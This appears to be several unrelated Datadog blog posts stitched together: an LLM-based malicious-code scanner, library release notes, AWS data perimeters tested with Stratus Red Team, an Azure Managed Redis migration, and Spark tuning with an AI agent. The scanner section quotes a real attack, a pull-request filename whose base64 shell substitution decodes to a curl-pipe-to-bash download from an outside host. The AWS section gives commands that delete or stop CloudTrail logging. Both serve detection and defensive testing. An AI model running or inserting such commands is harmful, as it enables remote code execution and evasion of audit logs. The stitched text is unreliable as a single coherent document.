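As a quick sanity check on those figures, the arithmetic can be reproduced directly. The post does not give the full error breakdown, so the counts below are an assumption: 18 misclassified diffs before (the 17 false positives plus one other error) and 1 after is one breakdown consistent with the reported percentages.

```python
TOTAL_DIFFS = 690  # sample size reported in the post


def accuracy(total: int, errors: int) -> float:
    """Fraction of diffs classified correctly."""
    return (total - errors) / total


# Assumed error counts (not stated in the post): 18 before, 1 after.
before = accuracy(TOTAL_DIFFS, 18)
after = accuracy(TOTAL_DIFFS, 1)
print(f"{before:.1%} -> {after:.2%}")  # prints "97.4% -> 99.86%"
```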

You can see how the wider context, such as PR state and author background, improves accuracy between our first- and second-stage evaluations in the recent Hackerbot Claw attack.

Filter stage assessment:

Diff creates a file named with shell command substitution: documentation/rules/m$(echo${IFS}Y3VybC...|base64 -d|bash).md. The embedded base64 decodes to a curl ... | bash payload. This is an attempt to download and execute remote code via filename expansion (remote code execution/backdoor).

Agentic investigation verdict:

This PR contains a clear command injection attack embedded in the filename. The filename `m$(echo${IFS}Y3VybCAtc1NmTCBoYWNrbW9sdHJlcGVhdC5jb20vbW9sdHwgYmFzaA${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash).md` uses shell command substitution with base64-encoded payload that decodes to `curl -sSfL hackmoltrepeat.com/molt| bash`, which attempts to download and execute malicious code from an external server. The `${IFS}` technique is used to obfuscate the command and bypass security filters. The author 'hackerbot-claw' is a newly created account (7 days old) with no profile information, and zero followers - typical indicators of a throwaway attacker account. The PR has no reviews or approvals.

As a consequence of this approach, the filter phase also needed to be fine-tuned and made extra wary of changes to avoid false negatives or degradation in quality. We saw one example of this with domain typosquatting attacks: without access to tools that allowed it to do exploratory work, the filter would incorrectly classify Datadog-like domains as legitimate.

To build around this limitation, we added a preprocessing pipeline that extracts all domains from the input and performs checks against a static list of typosquatting attack variants generated from a legitimate Datadog domain list. This allows the simple chat completion prompt to know if an attacker is using a Datadog-adjacent domain to try to fool the prompt, and provides a clear example of how expensive, nondeterministic LLM checks can be combined with static checks to improve accuracy while maintaining cost.
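A static check of this kind might look like the following sketch. It is an illustration under stated assumptions rather than Datadog's preprocessing code: the legitimate domain list here holds a single example entry, the variant generator covers only three simple typo classes (omitted, doubled, and swapped characters), and `typo_variants` and `find_typosquats` are hypothetical names.

```python
import re
from typing import List, Set

# Illustrative list; the real legitimate-domain list is not given in the post.
LEGIT_DOMAINS = {"datadoghq.com"}

DOMAIN_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.IGNORECASE)


def typo_variants(domain: str) -> Set[str]:
    """Generate simple typosquatting variants of a domain's name label."""
    name, _, tld = domain.rpartition(".")
    variants = set()
    for i in range(len(name)):
        variants.add(f"{name[:i]}{name[i + 1:]}.{tld}")       # omitted character
        variants.add(f"{name[:i]}{name[i]}{name[i:]}.{tld}")  # doubled character
    for i in range(len(name) - 1):
        swapped = name[:i] + name[i + 1] + name[i] + name[i + 2:]
        variants.add(f"{swapped}.{tld}")                      # swapped neighbors
    variants.discard(domain)  # swapping identical letters reproduces the original
    return variants


# Precompute the static list once so each scan is a set lookup.
STATIC_VARIANTS: Set[str] = set()
for legit in LEGIT_DOMAINS:
    STATIC_VARIANTS |= typo_variants(legit)


def find_typosquats(text: str) -> List[str]:
    """Return the lookalike domains found in the input text."""
    hits = set()
    for match in DOMAIN_RE.findall(text):
        base = ".".join(match.lower().split(".")[-2:])  # ignore subdomains
        if base in STATIC_VARIANTS:
            hits.add(base)
    return sorted(hits)
```

The result can be added to the filter prompt as plain text, so the model receives a deterministic signal about lookalike domains instead of having to judge them itself.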

Evaluating the software supply chain

This stacked approach has allowed us to expand the coverage of what we scan with BewAIre, evaluating an increasing share of the source code deployed to Datadog's environments while keeping our accuracy high and latency/cost low. Although evaluating diffs and pull requests is critical for protecting against insider risk or compromised accounts, and crucial as the volume of agent-generated code grows, we knew that scanning packages would add a new set of constraints.

How we handled context limits when scanning full dependency packages

Packages introduce a different set of challenges, and the biggest initial constraint we faced was size: packages and package upgrades typically contain far more lines of code than the average pull request.

While BewAIre's filter phase can manage large files through chunking, the agentic investigation stage introduces another constraint: its model has a different context window than the filter's. Resending full packages pushed us past context limits and increased cost, sometimes leading to context truncation or fallback to our filter's evaluation.

To address this, we ran three parallel experiments to identify an approach that would scale:

  • Forward only the malicious chunk identified by the filter.

  • Rechunk the entire package using the investigation agent's model context window.

  • Provide the investigation agent with a codemap and tool access, where the codemap is a concise structural overview of the codebase (file paths, sizes, and symbol locations), along with a verdict from the filter. The investigation agent can then use a ReadFile(filename, start_line, end_line) tool to inspect specific files on demand.
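The third option can be sketched as follows. This is a simplified illustration, assuming the package is already loaded as an in-memory mapping of file paths to source text. The symbol detection is a naive prefix match, and `build_codemap` and the codemap's field names are hypothetical. Only the `read_file(filename, start_line, end_line)` shape comes from the description above.

```python
from typing import Dict, List


def build_codemap(files: Dict[str, str]) -> List[dict]:
    """Summarize a package as file paths, sizes, and symbol locations."""
    codemap = []
    for path, source in sorted(files.items()):
        lines = source.splitlines()
        symbols = [
            {"line": number, "text": line.strip()}
            for number, line in enumerate(lines, start=1)
            # Naive symbol detection (assumption): definition-like prefixes only.
            if line.lstrip().startswith(("def ", "class ", "function "))
        ]
        codemap.append({
            "path": path,
            "lines": len(lines),
            "bytes": len(source.encode("utf-8")),
            "symbols": symbols,
        })
    return codemap


def read_file(files: Dict[str, str], filename: str, start_line: int, end_line: int) -> str:
    """Return lines start_line..end_line (1-indexed, inclusive) of one file."""
    lines = files[filename].splitlines()
    start = max(start_line, 1)
    return "\n".join(lines[start - 1:end_line])


if __name__ == "__main__":
    package = {
        "index.js": "function main() {\n  return 1;\n}\n",
        "install.js": "const x = 1;\nfunction postinstall() {\n  run(x);\n}\n",
    }
    for entry in build_codemap(package):
        print(entry)
    print(read_file(package, "install.js", 2, 3))
```

The agent starts from the small codemap and pulls in only the line ranges it decides to inspect, so prompt size no longer grows with package size.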

Three strategies for handling large packages: passing a single suspicious chunk, rechunking the full package, or using a codemap with targeted file reads.

The following table shows the results of our experiments across all malicious packages in our curated dataset. Strategy 3 (codemap + read_file) emerged as the preferred option because it matches the top exact-match accuracy of the other strategies, reduces error rates, and improves latency and cost compared to the baseline. In practice, this makes it more reliable for large packages while remaining efficient, giving us the highest end-to-end accuracy with a reasonable runtime and a scalable design.

In the table, end-to-end accuracy is approximated as exact_match × (1 − error_rate), combining prediction quality with the impact of runtime and API failures:

| Strategy | Implementation | Performance trend (vs. baseline) | End-to-end accuracy |
| --- | --- | --- | --- |
| Baseline (no strategy) | Filter → agent pipeline with no extra context management; agent sees the full package when it fits and errors on oversized inputs (fallback to the filter verdict). | Reference point: High latency and significant error rate on large packages. | 94.1% |
| Strategy 1: Reuse chunking | Same filter → agent pipeline but reuses chunking logic for V2 on large inputs (minimal behavioral change vs. baseline in practice). | Marginal change: Slight increase in error rate and negligible latency improvement. | 93.7% |
| Strategy 2: Agent phase chunking | Agent wrapped in RunWithChunking: Large inputs are split into up to N chunks (depending on input size), processed in parallel, and combined with an "any chunk malicious → package malicious" rule. | Efficiency gain: Significant reduction in error rates and faster average duration. | 94.9% |
| Strategy 3: codemap + read_file | Agent receives a lightweight codemap plus a read_file tool to load specific files on demand, instead of ingesting the entire package or chunking it. | Optimal balance: Eliminates runtime errors and maintains top-tier recall while drastically reducing token costs. | 95.2% |

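The end-to-end accuracy approximation is a single multiplication. The sketch below uses hypothetical inputs, because the post reports only the combined figure for each strategy and not the underlying exact-match and error rates.

```python
def end_to_end_accuracy(exact_match: float, error_rate: float) -> float:
    """Approximate end-to-end accuracy as exact_match * (1 - error_rate)."""
    if not (0.0 <= exact_match <= 1.0 and 0.0 <= error_rate <= 1.0):
        raise ValueError("both inputs must be fractions between 0 and 1")
    return exact_match * (1.0 - error_rate)


# Hypothetical inputs: 96% exact match on completed runs, 2% of runs failing.
print(f"{end_to_end_accuracy(0.96, 0.02):.2%}")
```

Because a failed run discounts the score in proportion to the error rate, a strategy that eliminates runtime errors can come out ahead even when its exact-match rate only ties the others.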
Scaling with predictable cost

Scanning tens of thousands of dependency packages for maliciousness sounds compelling in a perfect world where cost and latency are not constraints, but we needed to know whether we could integrate these systems practically and at scale.

After running evaluations against our curated dataset of malicious packages, and projecting against the token size distribution of the top 10,000 npm packages, we reached a clear conclusion. Because of our two-stage evaluation loop, costs are low, stable, and—most importantly—predictable for 95% of packages.

Memory leaks fixed in profiling, SCA, and periodic timers

This release: 4 fixes (bug fixes), AI-tallied from the release notes
Bug Fixes
  • internal: Fixed an issue that could have caused some timers, like the one responsible for Symbol Database uploads, to fire repeatedly after the first execution.
  • internal: This fix resolves a memory leak where reference cycles through PeriodicThread callbacks were invisible to Python's cyclic garbage collector and could accumulate when threads used bound methods as targets.
  • profiling: Fixes a memory leak in native frame tracking caused by unbounded native call-site metadata growth.
  • SCA: This fix resolves an issue where unresolved runtime reachability targets could accumulate across Software Composition Analysis updates, causing resident memory usage to grow over time.

In AWS environments, a data perimeter is a set of preventative controls that help ensure that your trusted cloud identities (principals or AWS services acting on your behalf) are accessing trusted resources from authorized networks. You can apply these controls at various levels of your infrastructure, such as per resource or across all resources in your AWS account.

The ability to apply controls at different levels creates an effective defense-in-depth approach to protecting data, but it also makes it hard to know where gaps exist. Datadog's 2025 Cloud Security report found that approximately 40% of organizations use data perimeters, with most applying them per resource. Of that group, [fewer than 1% use recommended organization-level solutions](https://www.datadoghq.com/state-of-cloud-security/#2:~:text=SCPs%20(0.6%25%20of%20organizations)), such as resource control policies (RCPs) and service control policies (SCPs).

In this post, we'll walk through examples of data perimeters configured per resource, since that's where most organizations apply them. Then we'll look at the security gaps that resource-level controls can create. In each section, we'll simulate an attack against each gap by using Stratus Red Team, an open source threat emulation tool, and then apply an organization-level policy that closes the gap.

We'll cover four scenarios:

- Visibility: ensuring that you have visibility into data perimeter activity, an important first step before applying any controls

- Identity perimeters: preventing identities outside your AWS account from accessing your data

- Network perimeters: validating that identities can only access resources from authorized networks

- Resource perimeters: ensuring that identities are not able to transfer data to unauthorized resources

All of the attack techniques described in this post require Stratus Red Team to be installed and configured with a compromised-role profile. We'll walk through configuring the necessary roles and AWS profiles later.

Ensure that you have visibility into data perimeter activity across your AWS infrastructure

While not strictly a data perimeter objective, AWS security benchmarks require that CloudTrail is enabled and configured to log read and write management events. CloudTrail trails can capture when a particular policy blocked or allowed access as well as any changes to the controls themselves, such as a bucket policy modification. Because cloud logs provide valuable insights into how your data perimeters respond to requests, tampering with logging is a popular defense evasion technique.

The Stratus Red Team techniques for deleting AWS CloudTrail trails and stopping logging altogether serve two purposes when you validate account-level logging scenarios that fall outside of established organization trails. First, they confirm whether your policies block the calls. Second, they confirm whether the attempts are visible in your account's cloud logs. When attempts are visible, your logs capture those calls the moment they are made, regardless of whether they succeed or are blocked.

The following commands set up the defense evasion scenario for a compromised role:

export AWS_PROFILE=compromised-role
stratus detonate aws.defense-evasion.cloudtrail-delete
stratus detonate aws.defense-evasion.cloudtrail-stop

The Stratus Red Team techniques for deleting or stopping cloud logging include a warmup step that uses the cloudtrail:CreateTrail permission to create new trails within the profile's associated AWS account before detonating attacks against them. CreateTrail has legitimate uses, such as centralizing logging pipelines and managing audit logs for incident response, so it's not uncommon to find it granted in real environments.

Confirm that calls are blocked by available SCPs

Most roles, such as those for application services and CI/CD pipelines, have no legitimate reason to modify CloudTrail trails, so those calls are candidates for an SCP. You can attach SCPs to an organization, organizational unit, or member account, creating the perimeter boundary for control plane actions such as disabling logging. That means that an appropriate SCP will block an identity (in this case, the compromised-role profile) from executing cloudtrail:DeleteTrail and cloudtrail:StopLogging calls.

The following example SCP denies modifications to a member account's CloudTrail trails:

{
   "Version":"2012-10-17",
   "Statement":[
      {
         "Effect":"Deny",
         "Action":[
            "cloudtrail:DeleteTrail",
            "cloudtrail:PutEventSelectors",
            "cloudtrail:StopLogging",
            "cloudtrail:UpdateTrail"
         ],
         "Resource":"*",
         "Condition":{
            "ArnNotLike":{
               "aws:PrincipalARN":"arn:aws:iam::123456789012:role/AWSCloudTrailAdmin"
            }
         }
      }
   ]
}

The cloudtrail:PutEventSelectors action is included in the deny policy because that call would enable an attacker to narrow which events get logged without disabling logging entirely, which minimizes the likelihood of detection. The cloudtrail:UpdateTrail action accounts for an attacker redirecting log delivery to an external S3 bucket, which makes the logs inaccessible to your team. The ArnNotLike condition ensures that a specific privileged role still has access to modify trails. For the account with this SCP attached, the Stratus Red Team techniques for cloudtrail:StopLogging and cloudtrail:DeleteTrail actions would be denied.
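To make the policy's logic concrete, the following sketch simulates how this one Deny statement treats a request. It is a deliberate simplification and not AWS's policy evaluation engine: it models only this statement, compares action names exactly, and uses shell-style matching as a stand-in for ArnNotLike. The compromised role ARN is a hypothetical example.

```python
from fnmatch import fnmatchcase

# Actions and exempt role copied from the example SCP above.
DENIED_ACTIONS = {
    "cloudtrail:DeleteTrail",
    "cloudtrail:PutEventSelectors",
    "cloudtrail:StopLogging",
    "cloudtrail:UpdateTrail",
}
EXEMPT_ARN_PATTERN = "arn:aws:iam::123456789012:role/AWSCloudTrailAdmin"


def scp_denies(principal_arn: str, action: str) -> bool:
    """Return True if the example Deny statement applies to this request."""
    if action not in DENIED_ACTIONS:
        return False  # the statement does not cover this action
    # ArnNotLike: the Deny applies to every principal that does NOT match.
    return not fnmatchcase(principal_arn, EXEMPT_ARN_PATTERN)


if __name__ == "__main__":
    compromised = "arn:aws:iam::123456789012:role/compromised-role"  # hypothetical
    print(scp_denies(compromised, "cloudtrail:StopLogging"))        # True
    print(scp_denies(EXEMPT_ARN_PATTERN, "cloudtrail:DeleteTrail"))  # False
```

A False result means only that this statement does not deny the call. The principal still needs an explicit Allow from its identity-based policies for the request to succeed.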

Note that SCPs do not apply to your organization's management account, where you create and apply organization-level policies. A compromised principal in that account can call cloudtrail:StopLogging regardless of your SCPs, which is why access to a high-privilege management account needs to be treated as a separate security risk.

Confirm that attempts are visible in CloudTrail logs

Even if an attempt to modify cloud logging is blocked, you want to confirm that CloudTrail recorded each event. The attempt itself is suspicious since logging is a required security benchmark. Because the Stratus Red Team techniques act on the trails they create within a member account, your organization-level trail should capture the detonation events, whether the attempt succeeds or is blocked by an SCP.
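One way to confirm visibility is to scan exported CloudTrail records for the tampering calls. The sketch below assumes that the records are already loaded as dictionaries, for example from a log file delivered to S3. The `eventSource`, `eventName`, `errorCode`, and `userIdentity` fields follow the CloudTrail record format, while the `tampering_attempts` helper and the sample records are illustrative.

```python
from typing import Dict, List

TAMPERING_EVENTS = {"DeleteTrail", "StopLogging", "UpdateTrail", "PutEventSelectors"}


def tampering_attempts(records: List[Dict]) -> List[Dict]:
    """Return CloudTrail-modifying calls, whether they succeeded or failed."""
    attempts = []
    for record in records:
        if record.get("eventSource") != "cloudtrail.amazonaws.com":
            continue
        if record.get("eventName") not in TAMPERING_EVENTS:
            continue
        attempts.append({
            "event": record["eventName"],
            "principal": record.get("userIdentity", {}).get("arn"),
            # A record with an errorCode describes a call that did not succeed.
            "failed": "errorCode" in record,
            "error_code": record.get("errorCode"),
        })
    return attempts


if __name__ == "__main__":
    sample = [  # illustrative records, trimmed to the fields used here
        {"eventSource": "cloudtrail.amazonaws.com", "eventName": "StopLogging",
         "errorCode": "AccessDenied",
         "userIdentity": {"arn": "arn:aws:sts::123456789012:assumed-role/compromised-role/s"}},
        {"eventSource": "s3.amazonaws.com", "eventName": "GetObject"},
    ]
    for attempt in tampering_attempts(sample):
        print(attempt)
```

Both outcomes matter: a failed attempt shows that the SCP held, and a successful one shows a gap. The attempt deserves an alert in either case.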

You can read AWS's guide on managing CloudTrail costs and our guide on configuring AWS CloudTrail logs for more information about how to collect them and which events are important to capture.

Enforcing an identity perimeter on your AWS account

One of the control objectives for the identity perimeter is ensuring that only your organization's principals and the AWS services acting on their behalf can access your resources. According to our report, the majority of organizations with data perimeters enforce this control primarily through policies on individual Amazon S3 buckets. Per-resource policies offer granular control, but they introduce gaps in policy coverage as your environment grows. They are also less durable, because any principal with the right permissions can modify them.

The following bucket policy illustrates how organizations typically start building per-resource identity controls for a log bucket:

{
   "Version":"2012-10-17",
   "Statement":[
      {
         "Sid":"AllowCloudTrailWrite",
         "Effect":"Allow",
         "Principal":{
            "Service":"cloudtrail.amazonaws.com"
         },

Azure Managed Redis is a Microsoft first-party, fully managed in-memory data store, replacing Azure Cache for Redis tiers. It includes Redis Enterprise features such as RediSearch for vector search and full-text search, in addition to RedisJSON, RedisTimeSeries, and Active Geo-Replication. As Azure Cache for Redis reaches end of life, more teams are planning migrations to Azure Managed Redis in search of better performance, lower cost, and modern capabilities for AI and real-time workloads.

Cache migrations are deceptively risky. Redis often handles latency-sensitive user requests, so an undersized cache, a misconfigured client, or a forgotten dependent service can result in immediate user-visible slowness or outages. Two things make the difference between a clean migration and an unsuccessful one: a single observability layer covering both sides of the cutover, and a reliable way to move data and traffic. Together, Datadog and Eden meet both requirements.

Datadog provides unified observability across the legacy cache and the new Managed Redis deployment, helping teams capture premigration performance, monitor the cutover, and validate performance after migration. Eden provides the app-aware execution layer for data replication, traffic routing, dual-write consistency, and instant rollback.

In this post, we'll explore how you can use Datadog and Eden to:

  • Establish performance baselines for the legacy cache before you migrate

  • Move the data and shift traffic with zero downtime

  • Monitor the cutover with side-by-side dashboards

  • Validate parity between the legacy cache and the new cache

  • Keep your Azure Managed Redis cache healthy after the migration

Establish performance baselines for the legacy cache before you migrate

The first migration question is also the hardest: Which Managed Redis configuration should you choose, and how many shards do you actually need? Guessing can lead to an underprovisioned cache that regresses application latency or an overprovisioned cache that wastes the cost savings the migration was supposed to deliver.

Datadog's existing Azure Cache for Redis integration and Redis integration capture the data needed to size the new cache. Use the out-of-the-box (OOTB) dashboards to extract baselines from a representative window, ideally one that includes a peak traffic event. Focus on the following metrics:

  • Peak operations per second: indicates the throughput tier you need

  • p99 cache latency: establishes the latency target that the new cache should match or improve on

  • Working set size (used memory at steady state): tells you the minimum memory configuration for the new instance

  • Hit rate: confirms how dependent your application is on cache effectiveness, which sets the bar for postmigration validation

  • Connection counts and connection churn: guide cluster sizing and reveal client pools that might need tuning before cutover

Save the baselines as Datadog notebooks so that you can refer back to them during and after the migration. You can use the same numbers to size the new instance and choose the right migration strategy. For example, a high-traffic, customer-facing system often benefits from a gradual rollout rather than a quick cutover.
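If you export the underlying samples, the baseline figures are straightforward to compute. The sketch below is a minimal illustration that assumes you already have per-interval throughput samples, latency samples, and hit and miss totals for the window. The `baseline` helper, its field names, and the sample values are hypothetical and are not taken from the Datadog integration.

```python
import statistics
from typing import Dict, Sequence


def baseline(
    ops_per_sec: Sequence[float],
    latency_ms: Sequence[float],
    hits: int,
    misses: int,
) -> Dict[str, float]:
    """Condense a representative window into sizing baselines."""
    return {
        "peak_ops_per_sec": max(ops_per_sec),
        # quantiles(n=100) returns 99 cut points; index 98 is the 99th percentile.
        "p99_latency_ms": statistics.quantiles(latency_ms, n=100)[98],
        "hit_rate": hits / (hits + misses),
    }


if __name__ == "__main__":
    # Hypothetical sample values for illustration only.
    window = baseline(
        ops_per_sec=[12_000, 18_500, 41_000, 22_300],
        latency_ms=list(range(1, 101)),
        hits=950,
        misses=50,
    )
    print(window)
```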

You should also create an anomaly-based monitor on the legacy cache during the planning phase. If a load test or a misbehaving deployment spikes traffic in a way that would invalidate your sizing assumptions, you want to know before you begin the migration.

Move the data and shift traffic with zero downtime

With your baselines captured, the next step is to use Eden to handle the data-movement aspect of the migration. Eden's migration layer, Exodus, sits in front of both caches. You don't need to write replication code, modify your applications, or schedule a maintenance window, so you can migrate with zero downtime. With Exodus, you can:

  • Replicate data from the legacy cache to the new Managed Redis instance so that the new cache is ready to serve traffic

  • Choose a cutover strategy (canary, blue/green, tenant-by-tenant, or big bang) and let Exodus shift traffic on your schedule

  • Mirror writes to both caches during cutover so that they stay in sync

  • Throttle adaptively so that neither the legacy cache nor the new cache is overwhelmed during peak load

  • Compare responses in replicated read mode to catch feature or module incompatibilities before users notice them

  • Roll back instantly at any stage if a regression occurs

Monitor the cutover with side-by-side dashboards

While Exodus runs the cutover, you can use Datadog to catch regressions early and confirm that dependent services stay healthy as traffic shifts. Exodus runs both caches in parallel and shifts traffic from the legacy cache to the new Managed Redis instance gradually, so you can watch the new cache pick up real production traffic before you fully commit to it.

The risk in this stage is not the data movement; it's the applications that depend on the cache. In a microservices environment, dozens of services often share a single cache. A forgotten configuration change can leave one service pointed at the legacy endpoint while everything else has shifted to the new cache, producing inconsistent behavior that is difficult to diagnose later.

Datadog's Software Catalog and APM traces help you identify dependent services and verify that each one migrates correctly. Filter the Software Catalog by your existing cache resources to see the upstream and downstream services that connect to it, along with the request volume that each service generates. Use this list as your cutover checklist. As you point each service to the new Managed Redis endpoint, watch for trace metrics from the new cache resource to appear in APM. Confirm that the legacy resource's traffic drains toward zero.

During cutover, display the metrics from both caches side by side in the same Datadog dashboard. Tag each environment clearly (for example, cache:legacy and cache:managed-redis) so that a single widget can show the new cache's hit rate climbing as the legacy cache's traffic drains. If the new cache begins to diverge from the legacy cache's baselines during cutover, the side-by-side view helps you identify regressions quickly and decide whether to roll back the migration.

To make rollback decisions automatic, configure short-lived cutover monitors specifically for the migration window:

  • Latency divergence monitor: Alert if p99 latency on the new cache trends meaningfully higher than the legacy baseline. Catches sizing or networking issues early enough to roll back.

  • Error-rate divergence monitor: Alert if the new cache's error rate exceeds the legacy cache's error rate by more than a small margin. Often signals a client compatibility issue.

  • Hit-rate divergence monitor: Alert if the new cache's hit rate falls materially below the legacy baseline after a representative volume of traffic has shifted. Catches working-set or time-to-live (TTL) drift before users feel it.

Delete these monitors after the cutover is complete.
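The three divergence conditions reduce to simple comparisons against the legacy baseline. The sketch below shows that logic in isolation. It is not Datadog monitor configuration, and the default thresholds (a 20% latency increase, a 0.5-point error-rate margin, and a 5-point hit-rate drop) are placeholder assumptions to replace with values that suit your workload.

```python
from dataclasses import dataclass
from typing import List


@dataclass
class CacheStats:
    p99_latency_ms: float
    error_rate: float  # fraction of requests that failed
    hit_rate: float    # fraction of reads served from the cache


def divergence_alerts(
    legacy: CacheStats,
    new: CacheStats,
    latency_factor: float = 1.2,    # assumed threshold
    error_margin: float = 0.005,    # assumed threshold
    hit_rate_margin: float = 0.05,  # assumed threshold
) -> List[str]:
    """Return the names of the divergence checks that the new cache fails."""
    alerts = []
    if new.p99_latency_ms > legacy.p99_latency_ms * latency_factor:
        alerts.append("latency")
    if new.error_rate > legacy.error_rate + error_margin:
        alerts.append("error_rate")
    if new.hit_rate < legacy.hit_rate - hit_rate_margin:
        alerts.append("hit_rate")
    return alerts


if __name__ == "__main__":
    legacy = CacheStats(p99_latency_ms=2.0, error_rate=0.001, hit_rate=0.95)
    print(divergence_alerts(legacy, CacheStats(2.1, 0.001, 0.94)))  # []
    print(divergence_alerts(legacy, CacheStats(3.0, 0.02, 0.80)))
```

Any non-empty result is a candidate rollback trigger.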

Validate parity between the legacy cache and the new cache

The migration is not finished the moment that traffic shifts. The real test is whether the new cache holds up across a full traffic cycle, including peak hours, batch jobs, and any usage patterns that the legacy cache was tuned for.

Compare the metrics from the Azure Managed Redis Overview dashboard against the baseline values that you captured in the planning stage:

  • Latency at p95 and p99 should match or improve on the legacy baselines. If it regresses, check server_load and percent_processor_time to confirm whether the gap is saturation or configuration.

  • Hit rate should be at or above the baseline after the new cache has warmed for one or two traffic cycles. A persistent gap usually means that TTL values need tuning or that a working set has grown beyond the cache configuration.

  • Used memory percentage and eviction rate should both be well below the legacy baselines if you sized the new cache correctly. A high eviction rate is the clearest sign that you need to scale up before regressions cascade.

Once you validate that the new cache matches the legacy deployment in performance and behavior, you can decommission the legacy cache. If you want a final side-by-side check before you decommission the cache, Datadog dashboards show both of the cache environments and their dependent applications in the same view throughout the validation window.

Keep your Azure Managed Redis cache healthy after migration

With the migration complete, the focus shifts to keeping the new cache healthy as it absorbs the full weight of production traffic. Dashboards are useful while a human is watching them, but monitors protect the cache the rest of the time. Configure monitors that cover the four most common issues that affect Redis cache performance:

  • Saturation: Alert on sustained high server load or CPU utilization, the clearest leading indicator of latency regressions.

  • Efficiency: Alert when the hit-to-miss ratio drops below your target, which usually means that TTL values need tuning or a working set has outgrown the cache configuration.

  • Memory pressure: Alert when memory utilization climbs and evictions begin so that you can investigate before the cache evicts frequently accessed data.

  • Availability: Alert on geo-replication health for any cache in an Active Geo-Replication group so that you can address issues before a failover exposes them.

When an alert fires, Datadog provides the troubleshooting surface to resolve it. The Managed Redis dashboard, APM traces from the applications calling the cache, and logs from surrounding services all live in the same workspace. As a result, you can cross-reference a saturation alert against the deployments, traffic spikes, or upstream issues that might have caused it.

Rely on Datadog and Eden for your Azure Managed Redis migration

For teams moving from Azure Cache for Redis to Azure Managed Redis, Datadog and Eden together support the full migration process. Datadog provides observability across the legacy cache, the new instance, and the applications that depend on either. Eden, meanwhile, moves the data and the traffic with zero downtime. As an official Microsoft Cloud Adoption Framework partner, Datadog supports the full Azure migration life cycle by helping teams apply consistent observability practices across Redis, compute, storage, and other Azure services.

To learn more, read Datadog's Azure Managed Redis integration documentation. To start a Redis migration with Eden, see Eden's Redis migration page.

If you're new to Datadog, you can sign up for a 14-day free trial to start monitoring your Azure Managed Redis caches.

Spark jobs only get more expensive and harder to debug as they scale. It's a problem we've run into ourselves. Our Referential Data Platform team builds and maintains the knowledge graph that maps relationships between customers' observability entities. ServiceQueryEdge is at the center of that graph, mapping service entities to their associated metric and log queries. It runs daily across seven data centers, with individual partitions processing up to 27 TB of input and 16 billion records. At that scale, we were averaging $1.5k of infrastructure costs daily, with each run taking over 17 hours.

AI agents seemed like a natural fit for this problem. They're good at reasoning over code, connecting symptoms to root causes, and generating hypotheses quickly. But an agent working from code alone is still guessing. It needs to know what's actually slow.

In this post, we'll walk through how we used Datadog's Data Observability Jobs Monitoring and an AI agent built on Claude to debug and optimize ServiceQueryEdge. We'll cover what worked, what didn't, and the specific changes that cut our daily compute costs by 44% and reduced run duration by 60% in US1, our largest data center.

Closing the gap between Jobs Monitoring and the codebase

To understand where inefficiencies are, we rely on Jobs Monitoring with the Spark SQL Plan to get a visual, interactive representation of the full execution plan. However, even with that visibility, correlating a slow operator in the SQL Plan back to the relevant section of application code can still take time, particularly for a large, complex job like ServiceQueryEdge.

To speed up debugging, we built an AI agent to surface any bottlenecks across the execution graph and suggest fixes. We created a custom prompt structure that ingests the same data shown in Jobs Monitoring, such as stage metrics, the SQL execution plan, and telemetry data, alongside the source code. This allows the agent to perform correlation work that would usually fall on one of the team's engineers, which can save hours of manual investigation. For every issue the agent flags, the engineer lands directly at the relevant node with context on why it matters.

Getting signal from noise: scoping data for AI-assisted debugging

At first, we ran into problems with Claude depleting its context while making Model Context Protocol (MCP) calls through our Datadog MCP Server to collect Spark data from Jobs Monitoring. The agent pulled job run telemetry data, represented as traces, using the get_datadog_trace, apm_search_spans, and apm_explore_trace tools. Multiple runs made the problem worse. The agent exhausted its context window before completing meaningful analysis. Suggestions became incomplete or incoherent.

We alleviated this by using subagents that delegated the acquisition of specific information into targeted tasks, preserving context for the analysis work that actually mattered. Agent output quality depended less on data volume than on how precisely that data was scoped.

However, the agent's initial suggestions didn't work. Many recommendations were either off target or addressed symptoms rather than root causes. For example, the agent suggested pruning column reads to reduce the amount of data read, which was redundant because Spark had already applied that optimization.

Our first instinct was to try reducing the noise by feeding deeper embeddings of Spark runtime info and metrics from Jobs Monitoring into the agent. The additional context helped the agent identify more issues and generate more recommendations. But false positives also increased significantly.

Our next step was to add another subagent, a validator, that filtered out issues we deemed irrelevant or superficial. The validator works as a grader rather than a generator. It pulls the same context as the main agent (job health and the SQL plan), but its job is to find reasons a proposed fix won't work.

Optimization #2: Apply spam filter before the main join (line 766)

  Contraindication Checks:
  1. ❌ Does the spam filter actually reduce significant rows? — The LeftAnti join outputs 3,406,939,340 rows — same as the left input (3,406,939,340 from the Exchange). This means the 628 spammy metrics contribute near-zero rows to the 3.4B total. The spam filter removes metrics by (org_id, metric_id) but the main join key is (org_id, metric_name). Even if these 628 metrics were removed earlier, the 3.4B metrics-side of the main join would barely decrease.
  2. ✅ Is the filter already applied before the main join? — Looking at the data flow: metricsWithTagsRaw → spam filter → metricsWithTags → salt → metricsWithTagsSalted → main join at line 766. The spam filter IS already applied before the main join in the code.
  3. ❌ Would earlier filtering help? — The spam filter requires a groupBy($"org_id", $"metric_id").agg(countDistinct(...)) over the full metricsWithTagsRaw. This aggregation itself is expensive. Moving it "earlier" doesn't change the fact that you need the full dataset to compute the counts.

The validator's output looks like a peer review. For each suggestion, it lists checks using metrics from Jobs Monitoring and the code. If most checks fail, we discard the suggestion before wasting engineering time. The validator caught that many of the agent's top suggestions came down to implementing optimizations Spark was already doing automatically.
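The discard rule described above can be sketched in a few lines of Python. This is an illustration only, not the validator's actual implementation: the `Check` class and `should_discard` function are hypothetical names, and "most checks fail" is assumed to mean "more than half".

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Check:
    """One contraindication check from a validator review (hypothetical type)."""
    question: str
    passed: bool


def should_discard(checks: list[Check]) -> bool:
    """Discard a suggestion when more than half of its checks fail.

    Assumption: "most checks fail" is read as a strict majority.
    """
    failed = sum(1 for check in checks if not check.passed)
    return failed > len(checks) / 2


# The three checks from the spam-filter review shown earlier.
spam_filter_review = [
    Check("Does the spam filter actually reduce significant rows?", passed=False),
    Check("Is the filter already applied before the main join?", passed=True),
    Check("Would earlier filtering help?", passed=False),
]

print(should_discard(spam_filter_review))  # True: 2 of 3 checks failed
```

A plain majority vote is the simplest reading. A real grader could also weight checks, so that a single decisive contraindication is enough to reject a suggestion.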

From theory to improvement: What actually worked

With the validator in place, we concentrated on the issues that passed scrutiny. Three optimizations proved most impactful: salting, join reordering, and broadcast hints.

Optimization 1: Salting

